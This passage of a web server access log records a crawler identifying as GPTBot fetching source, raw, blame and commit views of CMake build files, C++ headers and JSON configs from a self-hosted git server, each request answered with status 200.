+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10809] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11714] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json" -[17/Feb/2026:17:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11108] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" -[17/Feb/2026:17:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11896] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json" -[17/Feb/2026:17:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11313] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json" -[17/Feb/2026:17:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" -[17/Feb/2026:17:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43111] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21751] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10268] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10316] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10267] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10316] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10301] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10275] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:36:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:36:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11178] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33373] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:17:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33666] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33667] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33665] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33372] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:17:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33372] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:17:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:17:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:17:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43100] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43100] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43103] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 